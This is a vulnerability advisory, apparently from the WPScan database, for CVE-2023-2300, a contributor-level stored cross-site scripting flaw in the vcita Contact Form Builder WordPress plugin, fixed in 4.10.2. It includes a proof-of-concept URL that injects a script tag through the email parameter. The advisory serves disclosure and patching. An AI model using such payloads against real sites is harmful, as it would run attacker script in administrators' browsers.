Contact Form Builder by vcita < 4.10.2 – Contributor+ Stored Cross-Site Scripting | CVE 2023-2300 | Plugin Vulnerabilities

Description

The plugin does not sanitize and escape the email parameter in the plugin settings, which could allow users with roles as low as contributor to inject arbitrary web scripts targeting higher privileged users, such as administrators, into the plugin settings.

Proof of Concept

https://example.com/wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a"/><script>alert(1);</script>

Affects Plugins

contact-form-with-a-meeting-scheduler-by-vcita

Fixed in 4.10.2

References

CVE

URL

https://blog.jonh.eu/blog/security-vulnerabilities-in-wordpress-plugins-by-vcita

URL

https://plugins.trac.wordpress.org/browser/contact-form-with-a-meeting-scheduler-by-vcita/trunk/system/parse_vcita_callback.php#L55

Miscellaneous

Original Researcher

Jonas Höbenreich

Verified

No

WPVDB ID

168ea568-6ed0-4f55-901e-6813c8f7b379

Timeline

Publicly Published

2023-06-02 (about 2 years ago)

Added

2023-06-04 (about 2 years ago)

Last Updated

2023-07-04 (about 2 years ago)

Other

Published

Title

Published

2014-08-01

Title

DejaVu 2.4 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download

Published

2014-08-01

Title

NextGEN Gallery 2.0.0 - Directory Traversal

Published

2023-06-29

Title

Web3 – Crypto wallet Login & NFT token gating < 2.7.0 - Authentication Bypass

Published

2023-11-03

Title

Defender Security < 4.2.1 - Masked Login Area Security Feature Bypass

Published

2019-11-19

Title

Jetpack 5.1-7.9 - Vulnerability in Shortcode Embed Code